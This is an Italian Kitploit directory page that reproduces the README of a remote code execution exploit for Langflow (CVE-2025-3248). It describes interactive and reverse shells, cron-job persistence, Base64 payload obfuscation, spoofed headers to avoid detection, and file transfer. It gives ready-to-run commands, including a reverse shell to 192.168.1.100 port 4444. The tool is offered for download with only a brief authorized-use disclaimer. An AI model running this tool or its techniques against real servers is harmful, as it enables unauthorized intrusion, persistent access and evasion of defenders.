Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
langflow-rce-exploit — Exploit di Esecuzione Remota di Codice per Langflow (CVE-2025-3248) - [ Di S4Tech ] | Kitploit
Strumenti/GitHubGitHub/0-d3y/langflow-rce-exploit
Escalation di PrivilegiMeccanismi di PersistenzaAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingStrumento di Accesso RemotoSviluppo Payload
7151 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Exploit di Esecuzione Remota di Codice per Langflow (CVE-2025-3248) - [ Di S4Tech ]

Vedi Repository

Langflow RCE Exploit (CVE-2025-3248)

Python Version License Platform

Exploit di Remote Code Execution per Langflow (CVE-2025-3248)

Caratteristiche

  • Rilevamento automatico della vulnerabilità
  • Modalità di exploit multiple:
    • Shell interattiva
    • Esecuzione di un singolo comando
    • Connessione reverse shell
  • Caricamento di file
  • Interfaccia utente colorata
  • Metodi multipli per reverse shell
  • Persistenza della cronologia dei comandi

📌 Changelog (v2.0)

✨ Novità:

  • Sistema di payload avanzato con 5 metodi di esecuzione
  • Caricamento/scaricamento di file con codifica Base64
  • Persistenza tramite cron job (comando persist)
  • Aggiornamenti della shell interattiva:
    • upload local_path remote_path
    • download remote_path local_path
    • Comando clear per il terminale

🛡️ Miglioramenti di sicurezza:

  • Offuscamento automatico dei payload (Base64 + varianti casuali)
  • Rotazione degli header per ogni richiesta:
    • User-Agent casuale
    • IP X-Forwarded-For falsificati
  • Bypass HTTPS (supporto certificati autofirmati)
  • Nessun reindirizzamento per evitare il rilevamento

⚡ Miglioramenti tecnici:

  • Verifica della vulnerabilità a più stadi
  • Gestione avanzata degli errori per connessioni instabili
  • Registrazione completa della sessione in exploit_log.txt
  • Persistenza della cronologia dei comandi (.langflow_shell_history)

📊 Confronto delle versioni:

🐛 Bug risolti:

  • Risolti problemi di connessione HTTPS
  • Migliorata la gestione dei caratteri speciali nei comandi
  • Stabilizzata l'affidabilità della reverse shell

Requisiti

  • Python 3.6 o superiore
  • Librerie richieste:
    • requests
    • colorama
    • readline

Installazione

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Utilizzo

root@kitploit:~
python exploit.py <URL> [opzioni]

Opzioni disponibili:

Esempi:

  1. Verifica vulnerabilità:
root@kitploit:~
python exploit.py http://target.com
  1. Avvia shell interattiva:
root@kitploit:~
python exploit.py http://target.com --shell
  1. Esegui un singolo comando:
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. Avvia reverse shell:
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

Screenshot

Image.png)

Avviso

⚠️ Questo strumento è solo per scopi educativi e di test autorizzati.
⚠️ L'uso non autorizzato contro sistemi di cui non si è proprietari o per cui non si ha il permesso di testare è illegale.

Licenza

Questo progetto è concesso in licenza MIT - vedi il file LICENSE per i dettagli.

Autore

  • Mr.SaMi
    Twitter
    Instagram

Contributi

I pull request sono benvenuti. Per modifiche importanti, apri prima un issue per discutere cosa vorresti cambiare.

Scarica lo strumento
Funzionalitàv1.0v2.0
Metodi payload15
Trasferimento file❌ Non supportato✅ Supportato
Persistenza❌✅
Livello di stealthBaseAvanzato
Registrazione sessione❌✅
OpzioneDescrizione
--shellAvvia shell interattiva
--reverse IP PORTAvvia reverse shell verso IP:PORT specificato
--command CMDEsegue un singolo comando
--verboseAbilita output dettagliato
--timeout SECImposta timeout richiesta (predefinito: 10s)